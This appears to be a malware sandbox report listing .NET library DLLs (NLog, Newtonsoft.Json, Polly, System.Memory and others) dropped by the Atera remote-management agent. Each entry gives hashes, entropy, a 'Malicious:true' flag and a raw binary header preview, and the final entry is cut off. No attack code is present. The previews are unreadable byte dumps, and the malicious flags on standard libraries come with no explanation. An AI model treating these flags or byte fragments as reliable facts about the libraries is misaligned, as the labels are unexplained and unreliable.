                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ..............................`.....`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):354352
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.153589479592355
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:Qr/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvY2:Qhpp9xxIBeXGfvY2
                                                                                                                                                                                                                                                                                                                                  MD5:53594510735A737A2B25AF4B396EFE8F
                                                                                                                                                                                                                                                                                                                                  SHA1:3F4664E88F44BBDCA29AFFB78D866A76ED128965
                                                                                                                                                                                                                                                                                                                                  SHA-256:DFBBDBA40745B2FCDEC5973D1BB0352DD8618996A6231411C48D87D11C63D07A
                                                                                                                                                                                                                                                                                                                                  SHA-512:D9EBC5B83D8727E596EA6A72C49F58C5CB2BC02EC24B432709BCAA7C1C49E267F85520315EF644EC75DC24E3A5D49F64292A295822B27EDEFF452F552D8B89AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.Y..........." ..0..8..........nW... ...`....... ....................................`..................................W..O....`...............@..0(..........HV..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B................OW......H.......`...ht...................U........................................{*...*..{+...*V.(,.....}*.....}+...*...0..;........u......,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*. S]G. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*.0...........r...p......%..{*....................-.q.............-.&.+.......o3....%..{+....................-.q.............-.&.+.......o3....(4...*..{5...*..{6...*..{7...*..{8...*..(,.....}5.....}6.....}7......}8...*....0..k........u......,_(-

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071511083932349
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:o1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQs:o1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                                                                                                                  MD5:286642CD396C5B6CADC906B112B493EE
                                                                                                                                                                                                                                                                                                                                  SHA1:CB625FDBD26798B3042BC5CFFD010F4E73CDAF1B
                                                                                                                                                                                                                                                                                                                                  SHA-256:004BF709595E808AE59558AE7510A40277B7E31D99A5580B0E07F136EAE09130
                                                                                                                                                                                                                                                                                                                                  SHA-512:49773E5AD432F893C559308DA144596CE1DFB967DB5FCFB1805528CC7535E70A181ED8801CAE43A47B58656C9925A236B06A4F2C67802A1A875A3DCE3C9002DD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ....................................`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960469418569573
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:2BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUD:2BA/ZTvQD0XY0AJBSjRlXP36RMG6
                                                                                                                                                                                                                                                                                                                                  MD5:B61A163EC8F1E6A3A3572A90BA23F7CB
                                                                                                                                                                                                                                                                                                                                  SHA1:467FBA9F1C171B58B76F4E9E24ABA1CE5C91D02F
                                                                                                                                                                                                                                                                                                                                  SHA-256:87DA900259BEA3BB65D984FB6FCD3134661E3EB0883EBF24981D50CA5D36F51A
                                                                                                                                                                                                                                                                                                                                  SHA-512:87EADB61D95EF67CEA0EC8CF15C2E285AFF8C92941ADB47DBCE6886796DE45B4940EFA803D2A9333FADD09473E1B1A34660042D12562FB07EAF4A59C401244CA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... .......n....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):293424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.121629065121692
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:admT7N9hXNx16L/kakZieD2C6gVkRYKn6nUa9K+yB:adc7N/WkQHr64B
                                                                                                                                                                                                                                                                                                                                  MD5:3362FDB62A7980CA70C44B4DBDA5BE9B
                                                                                                                                                                                                                                                                                                                                  SHA1:77B328FD868E9BE19165C39B541E815BAD1FE13F
                                                                                                                                                                                                                                                                                                                                  SHA-256:A6B74A797384F89B692F2E1027A3F73B4FAD2A97914208158869A33068132A1C
                                                                                                                                                                                                                                                                                                                                  SHA-512:D0441E5C747707434C02A64E8FF3A49EDF33CFF2C9D22F2C22E8BDFEBC30A3CDF79B2ED96B8ABD819ECD042876BAA77C32E119EBB05BA0ECAC73DFE2BF971E86
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.d.........." ..0..H..........rb... ........... ..............................k.....`................................. b..O.......$............R..0(........................................................... ............... ..H............text....F... ...H.................. ..`.rsrc...$............J..............@..@.reloc...............P..............@..B................Tb......H.......\....V...........................................................0...........(......o......e...%.r...p.s....}......}......}.......}......{......e...%.r...p.s....o....r...po.... ....(.....|....(....-.."....}......{......e...%.r!..p.s....o........(....(....o.....(......(....-...}....*..}....*..{....*..{....*..0..a........{......W..}.....{....,..{.....o.....{.....{......e...%.r!..p.s....o.....{.......(....(....o....*..{....*....0..Z........{......P..}.....{....,..{.....o

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):277040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190725872261733
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:ISOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYl5:XuQlBAMW0BvltxZ66
                                                                                                                                                                                                                                                                                                                                  MD5:66C97A4217593113658977F5AEFC18D8
                                                                                                                                                                                                                                                                                                                                  SHA1:A7E4FF9BDB3800C1E93A0D521B53E344A10699FF
                                                                                                                                                                                                                                                                                                                                  SHA-256:9AD65CC593BFC60815124C6377A8F3EA4F031BCA01C688FB543B50A2B6418764
                                                                                                                                                                                                                                                                                                                                  SHA-512:D2A474718A38AA0EA738200D7584A5C21552DC76428176026C5509AE606FEA534F4AEABEDF93D5BAE5735754D82B2D93E4CFB67BCFEA9A435147D7BB4B1F0722
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............'... ...@....... ..............................?a....@..................................&..O....@..L...............0(...`.......%..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................&......H.......L[......................`%......................................^.{....,.(:...z..}.....*^.{....,.(:...z..}.....*"..(?...*"..(@...*...0..,.......sp......}........q...s7...sj....{.....(....*.0..-.......sr......}........s...s7....ss....{.....(....*....0..(.......st......}........u...s7.....{.....(....*.0..'.......sv......}........w...s7...sj.....(....*B...ss.....(....*......(....*.0..'.......sx......}........y...s7...sj.....(....*F...ss......(....*....0..Z..........}....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117308680869445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:QZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHe:Ggo0WPVTXg+
                                                                                                                                                                                                                                                                                                                                  MD5:A6D30251ED124D7656F523A7DF177D09
                                                                                                                                                                                                                                                                                                                                  SHA1:48092D267E067C1967B5ACF1AEBD9A18F0B91515
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC81827B885C0B109AAA3882469BB41D26871274B2E39D3B227FBD18858BF6A3
                                                                                                                                                                                                                                                                                                                                  SHA-512:466809068B5813AC5531D9E5C76BA080A3A15B0D1AFF2A7187149CD5366D990DFD07DF1D51EEB8FCC656ED5C2D1C099AC32E0416F219FC38B64BD1A2351EE502
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.677526036924594
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:gy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOq9tH6:guhMaVmzDC67EpYinAMxCQ
                                                                                                                                                                                                                                                                                                                                  MD5:8F678B241B955CF86CF65136ADE90539
                                                                                                                                                                                                                                                                                                                                  SHA1:DFD92464B9C5D6822062721C7C3497CD30850CC4
                                                                                                                                                                                                                                                                                                                                  SHA-256:15F8EEDC717B18D1A43BB3295BE6787E0DF002C284A06A4B9198851BCCFEB7F2
                                                                                                                                                                                                                                                                                                                                  SHA-512:482E6E33F22D7DC68D075600E3C6131A0B563796E34BEBE6352BE8455BD4ECC72F7B682C3E203FEE9CED67C78B60A96B58037CA7499D4F0F86E0B33AB836F048
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):409136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.098204637389941
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:bPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc17:p6heZBJm333M89QA+
                                                                                                                                                                                                                                                                                                                                  MD5:5B3639406ABB5AD7F16A90124B708862
                                                                                                                                                                                                                                                                                                                                  SHA1:466DB9D6BC5F2A8EB205E5F3A7F2EC8C52809597
                                                                                                                                                                                                                                                                                                                                  SHA-256:83717328623F05F5987DC258332BCA21C1F2858B7CE6B834AF5DA687B0948847
                                                                                                                                                                                                                                                                                                                                  SHA-512:F10717408E0140C8DBEFCCE9501CF03B86CECD32F2B55770879C28E21D793E45BD8B7EEED52E56E3386000A7BEEF7F0BDD05EBEFF99A44D1056512F48063F71C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.c...........!.................+... ...@....... ....................................`.................................H+..S....@..p...............0(...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................+......H...........tM..........PM..J...P .......................................6K/.%.L....7.......2.x..`..P.k:k.......0\W.j...;..xX.~..HB..S@.$.m...)4..<S1...C.Y......#ku.k&..2<..i{..>....U...s.'{:.(......}....*..{....*:.(......}....*..{....*r.(......}......}......}....*..0..5........-..*~.....o.....X...v....~.......o......o .........*6..(....(....*"..(....*.0..T........~!...("...-..-.~#...*../....+...X....($...-..-.~#...*..v........(%...~.......o&...*Z.~....2..~.........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.234968936412768
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWu:3zpjF0/t043e3vggr83jMYa/hU7HxVu
                                                                                                                                                                                                                                                                                                                                  MD5:BDFEF14C7A661E237F27B79E4FE950F6
                                                                                                                                                                                                                                                                                                                                  SHA1:83F7DC1950211EBEC2B326D0778E6A46781CF892
                                                                                                                                                                                                                                                                                                                                  SHA-256:689AF98555A3D5A36FE8841AD39F9196F60A6A5400A8CF41E6E0997F47E675F1
                                                                                                                                                                                                                                                                                                                                  SHA-512:1E698E4E1E6108524F48B6ED7720E0EE239679546FB429F415A52875C8FA0D5C0B2D8C3EE6F523D1B7E875D1FACA83B6A0EB5B62C0DAED414BDCB36FE0D5C043
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.................. ........... ..............................b&....@.................................X...O.......................0(.......... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........J...g..........p...0.............................................{!...*:.(".....}!...*..0..#........u......,.(#....{!....{!...o$...*.*v ..yN )UU.Z(#....{!...o%...X*....0..M........r...p......%..{!....................-.q.............-.&.+.......o&....('...*..{(...*:.(".....}(...*.0..#........u......,.(#....{(....{(...o$...*.*v ..:. )UU.Z(#....{(...o%...X*....0..M........r-..p......%..{(....................-.q.............-.&.+.......o&....('...*..{)...*..{*...*V.("...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179921646668756
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:YP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ils:Yh0qjC5RMOHO420kN1X
                                                                                                                                                                                                                                                                                                                                  MD5:8DDC05CED2922285C9037C7D503A86AA
                                                                                                                                                                                                                                                                                                                                  SHA1:AD66BA39BE8639D86877B515A68EC3D7AD3E7753
                                                                                                                                                                                                                                                                                                                                  SHA-256:30D4499D9F96D1B081C5A8B5F9D9792900DE6767243CBEAD81F6244C33C799E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:6B7E9AC11076C4FAEBF6F51610023BAF0F513DD0680CA2A07DA9AE5E6F6AC42EDBF8CA8F9ED210AC5F3C7D280E8ACBBDAFA4C6916ED2003B9D94693587EEF656
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`...........@.................................3...O.... ..0...............0(...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676696708568243
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Th06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBVmh:Ty9eEpYinAMxCAy
                                                                                                                                                                                                                                                                                                                                  MD5:2D491883E24603B382FDAD8840272070
                                                                                                                                                                                                                                                                                                                                  SHA1:78C442E11EA0B9ED3BBD09B19E6A18CC559CA58E
                                                                                                                                                                                                                                                                                                                                  SHA-256:EDF076BA91F6F5A808879D94A586D1BF78D5D0C8FDCD5399DE36FB6389301886
                                                                                                                                                                                                                                                                                                                                  SHA-512:0790CA5BB187AEFE4E5785C528C68E55EA4AFD642101A77A1D983599BC42AB4423723E910A0265CD9A5D3C7DFE0C9E9794DD6F6E8228B488A384647643C09C79
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ...............................w....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332801634669375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:kn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCr/:knvXYcIh6yFIFBYpc47Hxk
                                                                                                                                                                                                                                                                                                                                  MD5:B62DB814A8E1C5C8F4DE32F142D7709F
                                                                                                                                                                                                                                                                                                                                  SHA1:DB5998A9C785E77A1152145615213EA31E06B289
                                                                                                                                                                                                                                                                                                                                  SHA-256:F3E5DDD22B8F044C9B45D99762F2A339077790AB049C1AAB152F70BC7127466E
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F7DAE5AA68ED86A574F70478F99458C4A52B1913D232B20A58045EB1E49C83B9134DD90335FBCBEDEECF691EECE5A137FE06FF9F2F6B9D0607FACEA2C0D7C5B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... .............................../....@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.955263962444665
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq6L:67N1r9KGI04CCARLq6L
                                                                                                                                                                                                                                                                                                                                  MD5:F0A06E07C21B485434202D325B3AA058
                                                                                                                                                                                                                                                                                                                                  SHA1:6E4A0A572E3CA5A5B23D4633CE63300E3BB39658
                                                                                                                                                                                                                                                                                                                                  SHA-256:955FD5B1B046AFC9E62E2D0CA4698818FE1357EA764977D7A9B4A44C1F657169
